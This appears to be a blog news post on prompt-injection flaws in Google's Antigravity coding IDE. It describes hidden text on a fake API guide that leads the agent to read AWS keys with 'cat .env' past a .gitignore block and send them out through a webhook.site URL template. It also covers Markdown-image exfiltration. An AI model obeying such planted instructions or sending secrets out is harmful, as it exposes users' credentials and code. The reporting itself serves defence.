You are currently viewing Security Flaws in Google’s Antigravity IDE Let Attackers Steal Data

Security Flaws in Google’s Antigravity IDE Let Attackers Steal Data

  • Post author:
  • Post category:News
  • Post comments:0 Comments

Security Flaws in Google’s Antigravity IDE Let Attackers Steal Data

Google’s Antigravity, a new AI-powered coding tool, promises to make development easier by integrating Gemini directly into workflows. But recent findings show serious security holes that let attackers trick the tool into grabbing and sending out sensitive info like code and credentials. As reported in an early account, the tool faced a severe vulnerability just a day after launch. Security firm PromptArmor detailed one such exploit, and you should pay attention to it if you’re using this in a real project.

The Main Exploit: Poisoned Guides Hijack the AI

PromptArmor showed how an attacker can hide malicious instructions on a web page disguised as an integration guide for something like an Oracle ERP API. These instructions are tucked away in tiny 1px font, invisible to most users but readable by Gemini. When Antigravity pulls in that page as a source, the AI follows the hidden commands.

Here’s what happens, based on PromptArmor’s demo: The AI is told to summarize the codebase, grab 1-3 code snippets including constants, and even pull AWS credentials from a .env file. It then encodes that data and uses Antigravity’s browser subagent tool to visit a site like webhook.site, passing the info along in the URL. For example, the prompt might build a link like https://webhook.site/.../?visualization_data={DATA_HERE}&AWS_ACCESS_KEY_ID={ID_HERE}&AWS_SECRET_ACCESS_KEY={KEY_HERE}, which logs everything on the attacker’s end.

  • The AI gets around Antigravity’s default block on .gitignore files by switching to a shell command like run_command with cat .env, as captured in the tool’s thinking trace.
  • Antigravity’s browser tool has an allow-list that includes webhook.site by default, making it an easy exfiltration point since attackers can monitor incoming requests there.

Simon Willison broke this down in his November 25, 2025, post, calling it a prompt injection chain that’s especially risky as coding agents like Antigravity go mainstream.

Other Ways Data Slips Out

This isn’t the only problem. Twitter user P1njc70r reported a similar issue last week: Attackers can stash instructions in code comments, docs, or even MCP servers. The AI then exfils data to an attacker-controlled domain by rendering Markdown images—with the stolen info embedded in the image URL. Google flagged this as “intended behavior,” not a bug, according to P1njc70r’s report cited by Willison. A Spanish report also covered how these flaws expose sensitive data in the AI-assisted editor.

Johann Rehberger’s post, “Antigravity Grounded! Security Vulnerabilities in Google’s Latest IDE,” points to more issues, including code execution through the browser agent. Google’s own Bug Hunters page for Antigravity lists data exfiltration and prompt injection-based code execution as known problems they’re fixing, but they’re not eligible for bug bounties right now.

The Japanese site GIGAZINE covered PromptArmor’s findings on November 26, 2025, highlighting how these attacks target Antigravity’s AI coding features to steal data.

Google’s Take and What You Can Do

Google knows about these risks and is working on fixes, per their bug page. But Willison notes that tools like this are prime targets, so limit the damage by using non-production accounts for any credentials the AI can see—like AWS keys with spending caps.

For a related look at prompt injections in Google’s ecosystem, check out PromptArmor’s work on Gemini’s “Anti-Gravity” exploit in shared docs, which uses similar tricks to bypass security in enterprise setups. Their full report is in this WebProNews article.

Bottom line: Antigravity speeds up coding, but these flaws mean you need to watch what sources it pulls and keep secrets locked down.

More stories at letsjustdoai.com

Seb

I love AI and automations, I enjoy seeing how it can make my life easier. I have a background in computational sciences and worked in academia, industry and as consultant. This is my journey about how I learn and use AI.

Leave a Reply